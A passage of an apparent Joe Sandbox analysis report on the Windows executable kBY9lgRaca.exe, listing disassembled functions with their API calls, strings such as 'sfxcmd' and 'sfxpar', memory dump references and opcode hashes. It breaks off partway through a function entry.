GetExitCodeProcess.KERNEL32(?,?), ref: 00CCD959
CloseHandle.KERNEL32(?), ref: 00CCD97F
ShowWindow.USER32(?,00000001), ref: 00CCD9E1

Strings

.inf, xrefs: 00CCD89A
.exe, xrefs: 00CCD989

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: eb72b740c9000ab91ca13129aec70e2ad37306fa98df61c808a32c57bd9ea4ed
Instruction ID: 55d16ffbcd84a274fdefb6d218f196cc141c7f6077c6cf743729536e5dddd270
Opcode Fuzzy Hash: eb72b740c9000ab91ca13129aec70e2ad37306fa98df61c808a32c57bd9ea4ed
Instruction Fuzzy Hash: 0651C375404380AAEB309F24D844FBBBBE4AF86744F04043EF5D697291DBB19B85DB62

Function 00CDA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CD57FB,00CD57FB,?,?,?,00CDABAC,00000001,00000001,2DE85006), ref: 00CDA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CDABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CDAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CDAB35
__freea.LIBCMT ref: 00CDAB42

Part of subcall function 00CD8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38

__freea.LIBCMT ref: 00CDAB4B
__freea.LIBCMT ref: 00CDAB70

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 4be246429006937c8043e1dd329e9ff3f7727f8be7e7ec6c66ddcc79c60cbaac
Instruction ID: e28099a62083668e97c8b392cc00d1ab4d0d2c44b8f97658a54add2957e2f89b
Opcode Fuzzy Hash: 4be246429006937c8043e1dd329e9ff3f7727f8be7e7ec6c66ddcc79c60cbaac
Instruction Fuzzy Hash: 5151CF72600216BFDB258F64CC81EAFB7AAEB44710B15462FFE14D6240EB74DD41D6A2

Function 00CD3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,00CD3C35,00000000,00000FA0,00D12088,00000000,?,00CD3D60,00000004,InitializeCriticalSectionEx,00CE6394,InitializeCriticalSectionEx,00000000), ref: 00CD3C03

Strings

api-ms-, xrefs: 00CD3BC3

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 646d024d3785750638fb3badd4fde70b838e8fc9f05d7f1feed90358ef574991
Instruction ID: 37f100016f4a0aa6ff1c0481af33d6ec341775f6eab35a1f014e9cb8203ba986
Opcode Fuzzy Hash: 646d024d3785750638fb3badd4fde70b838e8fc9f05d7f1feed90358ef574991
Instruction Fuzzy Hash: E711A731A452A1BBCB218B699C8575D77A49F01770F150213EA25FB3D0D775EF008AD2

Function 00CB98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CB7760,?,00000005,?,00000011), ref: 00CB995F
GetLastError.KERNEL32(?,?,00CB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CB996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CB7760,?,00000005,?), ref: 00CB99A2
GetLastError.KERNEL32(?,?,00CB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CB99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CB99F9

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 7a9e4dcca5db660e7a63cf0955f5c876819eb253fb4676b02e81b01cd9a4adbb
Instruction ID: 78595d08d165df0cfcfa1a557df207d29d05bb58079647a2ca50fe03c2cb0ecf
Opcode Fuzzy Hash: 7a9e4dcca5db660e7a63cf0955f5c876819eb253fb4676b02e81b01cd9a4adbb
Instruction Fuzzy Hash: 1B311730944785AFE7309F24CC85BDABB98FB05320F200B1DFAB5961D1D7B5AA44CB95

Function 00CCB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB58A
IsDialogMessageW.USER32(00010410,?), ref: 00CCB59E
TranslateMessage.USER32(?), ref: 00CCB5AC
DispatchMessageW.USER32(?), ref: 00CCB5B6

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 4b2312fea4192416a317b56b6308bdc598c32c1323438593424faab902585fd3
Instruction ID: ae3cb8ffc100f17a3bf01ce6f1f662452596914603ff03509258545683107c7e
Opcode Fuzzy Hash: 4b2312fea4192416a317b56b6308bdc598c32c1323438593424faab902585fd3
Instruction Fuzzy Hash: 75F06D71A0121ABB8B209FE5DC4DEEB7FACEE056917408415B519D2150EF74D646CBB0

Function 00CD7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\kBY9lgRaca.exe,00000104), ref: 00CD7FAE
_free.LIBCMT ref: 00CD8079
_free.LIBCMT ref: 00CD8083

Strings

C:\Users\user\Desktop\kBY9lgRaca.exe, xrefs: 00CD7FA5, 00CD7FAC, 00CD7FDB, 00CD8013

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\kBY9lgRaca.exe
API String ID: 2506810119-1399711687
Opcode ID: 6429bd147fcd4ca86e15d4233155c12fbe0c27b425d2da2910e6af1040fff119
Instruction ID: 9da121a32d4a7e8959ec5c14e1040aefebede67ade54952a7a7ce7fcefa43d0a
Opcode Fuzzy Hash: 6429bd147fcd4ca86e15d4233155c12fbe0c27b425d2da2910e6af1040fff119
Instruction Fuzzy Hash: BA31A071A00208BFCB21EF95D8809AEBBBCEF84310F10416BF60497351DB719E49DB61

Function 00CCABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00CCABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00CCABF9

Part of subcall function 00CC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CBC116,00000000,.exe,?,?,00000800,?,?,?,00CC8E3C), ref: 00CC1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CCABE9

Strings

EDIT, xrefs: 00CCABCD, 00CCABD8, 00CCABE5

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 1d79c8c375eb14b9e581170cae8355395e8a5c5425fdaaedd98a8ed368cd6079
Instruction ID: fc58f2223e46dda0edb5187cb9a3a62d1e420ac736c976d51d170c4bc64a7764
Opcode Fuzzy Hash: 1d79c8c375eb14b9e581170cae8355395e8a5c5425fdaaedd98a8ed368cd6079
Instruction Fuzzy Hash: 43F0823660072877DB209A659C09FDB76AC9B4AB40F484029FA05E2180DB60DF4286B6

Function 00CCAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CC0836
Part of subcall function 00CC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CBF2D8,Crypt32.dll,00000000,00CBF35C,?,?,00CBF33E,?,?,?), ref: 00CC0858

OleInitialize.OLE32(00000000), ref: 00CCAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CCAC66
SHGetMalloc.SHELL32(00CF8438), ref: 00CCAC70

Strings

riched20.dll, xrefs: 00CCAC1E

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: c0abbc9d6fff0285a2190b9a72c9cec7c7518c19e5f7f4053229c284af038097
Instruction ID: 0d066694a3c8570a9bd4fb0b0fb46c26a6ac644585dc8f7663dc15732038805b
Opcode Fuzzy Hash: c0abbc9d6fff0285a2190b9a72c9cec7c7518c19e5f7f4053229c284af038097
Instruction Fuzzy Hash: 25F0FFB5900209ABCB10AFA9D8499EFFFFCEF94700F10415AE515E2251DBB456468FA1

Function 00CCDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CCDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CCDC30

Strings

sfxcmd, xrefs: 00CCDBEF
sfxpar, xrefs: 00CCDC2B

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: f83afcec8e85ec426bff69d117a9d9c2e5f918c64bc0b4a3c087d1c17fec3b58
Instruction ID: 0f9d0dc8e1b0901b5b60dc4e333167b126af510fa61bf88491a3b317ec53a765
Opcode Fuzzy Hash: f83afcec8e85ec426bff69d117a9d9c2e5f918c64bc0b4a3c087d1c17fec3b58
Instruction Fuzzy Hash: 16F0E5B2505264EBCB202F95CC4AFFF3B58BF04B82B04046DFD87DA051E6B09940E6B0

Function 00CB9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00CB9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CB97AD
GetLastError.KERNEL32 ref: 00CB97DF
GetLastError.KERNEL32 ref: 00CB97FE

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 3e60efad86c5969a08ca050e69491d2f1cfe6c9f8b910b0d0b2872e9dd03a0e1
Instruction ID: 8d8f46f3025e5f4c9a2f454494cc6d337d41c47e2303ec22ed8ce113933a889e
Opcode Fuzzy Hash: 3e60efad86c5969a08ca050e69491d2f1cfe6c9f8b910b0d0b2872e9dd03a0e1
Instruction Fuzzy Hash: 8611AC30910614EBCF209F65C844AED3BF9FB06320F10892AE62A961D0DB769F44DB61

Function 00CDAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CD40EF,00000000,00000000,?,00CDACDB,00CD40EF,00000000,00000000,00000000,?,00CDAED8,00000006,FlsSetValue), ref: 00CDAD66
GetLastError.KERNEL32(?,00CDACDB,00CD40EF,00000000,00000000,00000000,?,00CDAED8,00000006,FlsSetValue,00CE7970,FlsSetValue,00000000,00000364,?,00CD98B7), ref: 00CDAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CDACDB,00CD40EF,00000000,00000000,00000000,?,00CDAED8,00000006,FlsSetValue,00CE7970,FlsSetValue,00000000), ref: 00CDAD80

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: d1b279bb70a4f612eec14f3c5fb07122a848b0f9ae94c3a25b7ddb7ca3147e73
Instruction ID: 6a08bff3ef680bb54a1505735c1079f1abcdc9de97a75e6833d4c4d9d4f5a8f8
Opcode Fuzzy Hash: d1b279bb70a4f612eec14f3c5fb07122a848b0f9ae94c3a25b7ddb7ca3147e73
Instruction Fuzzy Hash: 9C014C32201262ABC7214E799C88B5B7B59EF01B627100621FA16D7750C720D901CAE1

Function 00CC101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00CC1043
SetThreadPriority.KERNEL32(?,00000000), ref: 00CC108A

Part of subcall function 00CB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB6C54

Strings

CreateThread failed, xrefs: 00CC104F

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 8a8f822a1b7036ea4c2ad24856465f9b21951d2d6b4e8614788d6c6b9d9815a6
Instruction ID: 65f79ac6508e9b4ea56f3c9ff7465b733d589edc85f76e5051e4a4d2ad4792a8
Opcode Fuzzy Hash: 8a8f822a1b7036ea4c2ad24856465f9b21951d2d6b4e8614788d6c6b9d9815a6
Instruction Fuzzy Hash: A70149B5300349AFD3306F25EC81FBA7398EB41351F24003EFE8257281CEA1B8858720

Function 00CB9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CBD343,00000001,?,?,?,00000000,00CC551D,?,?,?), ref: 00CB9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CC551D,?,?,?,?,?,00CC4FC7,?), ref: 00CB9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CBD343,00000001,?,?), ref: 00CBA011

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: c21334005c57f65daba922d0f80818aabbc67128a0e42fc6030c626639d749b6
Instruction ID: af1c192c11a049a78426989e5763aeb4d0b80b1fef791a5a31fa87cd32eafc63
Opcode Fuzzy Hash: c21334005c57f65daba922d0f80818aabbc67128a0e42fc6030c626639d749b6
Instruction Fuzzy Hash: 0D31C431204345AFDB14DF24E848BBE77A5FF84721F04451DF9929B290CB75AE48CBA2

Function 00CBA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00CBC27E: _wcslen.LIBCMT ref: 00CBC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA30C
GetLastError.KERNEL32(?,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA329

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 7440ac16018d7a3083b6345e55f489a462a5d9620fc2ade2d62826fa2c846f2a
Instruction ID: bc1214ba770444764f1d5c60811def679016c4b1d2e0f602e40100a115debdc5
Opcode Fuzzy Hash: 7440ac16018d7a3083b6345e55f489a462a5d9620fc2ade2d62826fa2c846f2a
Instruction Fuzzy Hash: 3F01F7322003646AEF21AB758C4ABFE37CC9F0A780F044415F992E70A1DB64DB81D6B7

Function 00CDB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CDB8B8

Strings

, xrefs: 00CDB8FD

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: f1f87df33cb6213f21237470f37fa0ec9fa63e9be6c894eb117e72678d6c97b2
Instruction ID: 33cd1a275ac022c9d62f9743f391d0ae9b7886fba3cecd542ef1c7d0cd1d293a
Opcode Fuzzy Hash: f1f87df33cb6213f21237470f37fa0ec9fa63e9be6c894eb117e72678d6c97b2
Instruction Fuzzy Hash: 6641D87090438CDADB218E65CC94BFABBF9DB55304F1404EEE79A86242D335AE46DB60

Function 00CDAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00CDAFDD

Strings

LCMapStringEx, xrefs: 00CDAF7D, 00CDAF87

Memory Dump Source

